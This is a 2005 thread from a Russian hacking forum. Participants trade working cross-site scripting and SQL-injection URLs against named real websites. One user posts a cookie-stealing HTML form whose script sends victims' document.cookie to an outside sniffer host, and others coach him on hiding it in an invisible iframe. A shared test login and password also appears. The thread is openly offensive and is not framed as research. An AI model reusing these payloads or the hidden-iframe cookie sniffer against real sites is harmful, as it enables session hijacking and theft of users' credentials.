Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
22.11.2005, 14:01
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
пока нашол раскрытие пути, щас еще поищу
Warning: Cannot modify header information - headers already sent by (output started at /var/www/hackthissite.org/html/includes/layout/header.php:12) in /var/www/hackthissite.org/html/pages/articles/read_article.php on line 21
You are not logged in! Redirection to: http://www.illgotten.net/view/390.phpIf you wish to view this article with added HTS functionality, please register/login in |
|
|
22.11.2005, 14:08
|
|
Banned
Регистрация: 19.11.2005
Сообщений: 17
Провел на форуме:
49385
Репутация:
1
|
|
Это не бага, это ошибка которая говорит, что ты не зареган не залогинен.
Найдешь мне багу на этом сайте, буду у тебя в долгу. Это касается всех. Кто найдет багу на этом сайте, у того Белый Джордан будет официально в долгу. 
Логин и пассворд для желающих.
zaq123qwerty:12345
Последний раз редактировалось Бафун; 22.11.2005 в 14:13..
|
|
|
|
22.11.2005, 21:41
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
http://megafon.buongiorno.com/megafo...ian/index.html где просят номер телефона (+7....)Можно вводить любой код
http://www.tefal.ru/tefal/magazine/recipe_results.asp?keyword=">%3Cscript%3Ealert%28% 29%3C%2Fscript%3E&selectName=&APPLIANCE=&SPECIAL_D IETS=&x=0&y=0
http://lafox.net/shop/?gid=73'"><script>alert()</script>
http://www.hacktivist.net/anarchy/index.php?action=search'
http://www.sexonly.ru/katalog.php?ganr=20'
http://www.icq.com/icqchat/browse_folder.php?tid=30279";//--></script><script>alert()</script>
http://www.download.com/3120-20_4-0.html?tag=srch&nid=1&qt=666&tg=dl-2001"><script>alert()</script>
http://www.osmarket.ru/products/5'
http://zubov.net/666"%20style=background:url(javascript :alert());". cfm?nft=1&t=5&p=1
http://drocher.ru/goods_list.php?rubric_id=14"><script>alert()</script>
|
|
|
|
22.11.2005, 21:57
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
http://hosting.mail.ru/WhoisService.jsp?domain=<img%20style="background:u rl(vbscript:confirm())"> IE
|
|
|
|
22.11.2005, 22:24
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800
Репутация:
547
|
|
Сообщение от k1b0rg
на почитай
http://dante.net.ru/forum/printthread.php?t=225
а так общий вид сводиться к тому, что имеется допустим твоя страничка, ставишь на нее два фрейма, один скрытый, в него помещаешь xss пасивную и сниффер.
это я тебе на "пальцах объяснил" -------------------------------------------------------------------
Вот прочитал статью и сделал всё как тама :
Код HTML:
<html>
<body onload="document.forms['snif'].submit()">
<form name="snif" action="http://www.mix.az/engine/modules/imagepreview.php?image=');">
<input type="text" name="word" value="<script>img = new Image();
img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>">
</form>
---------------------------------------------------------------------
Сохранил всё на ХТМЛ, и поместил у себя на сайте,открыл эту страничку , алерт не кидает, и на лог снифера нечего не идёт , почему , что я так не делаю под правь меня?
|
|
|
|
22.11.2005, 23:15
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
http://www.npj.ru/in/dura-lex-group/by/pvp/42564"%20style=background:url(javascript :alert()); "
http://www.uinc.ru/news/sendnews.php
тема:" style=background:url(javascript :alert(1));"
Сообщение:</textarea><script>alert(2)</script>
Ваше имя:" style=background:url(javascript :alert(3));"
Ваш E-mail:" style=background:url(javascript :alert(4));"
Введите код, указанный на картинке: НЕ ввожим, жмем отправить получаем alert
может быть это и активная xss, хз я не проверял.
p.s. Tem
в скрытом фрейме можешь просто написать
<script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
а не видно, наверное потому он и скрытый |
|
|
|
22.11.2005, 23:23
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800
Репутация:
547
|
|
Так или я рехнулся, или уже спать хочется, и я перестал сооброжать, а где этот скрытый фрейм. ((
Или мне проста надо создать фрейм ?
Последний раз редактировалось Tem; 22.11.2005 в 23:25..
|
|
|
|
22.11.2005, 23:25
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
Замени весь файл на
<iframe widht=0 height=0 frameborder=0 src=http:/// ></iframe>
да и все дела
|
|
|
|
22.11.2005, 23:37
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800
Репутация:
547
|
|
|
|
|
|
22.11.2005, 23:55
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
<AD- me замени на <iframe
<AD- ame>замени на </iframe>
почитай про фреймы.Возьми какой нить учебник и прочти, там немного читать, зато сразу разберешься что к чему |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
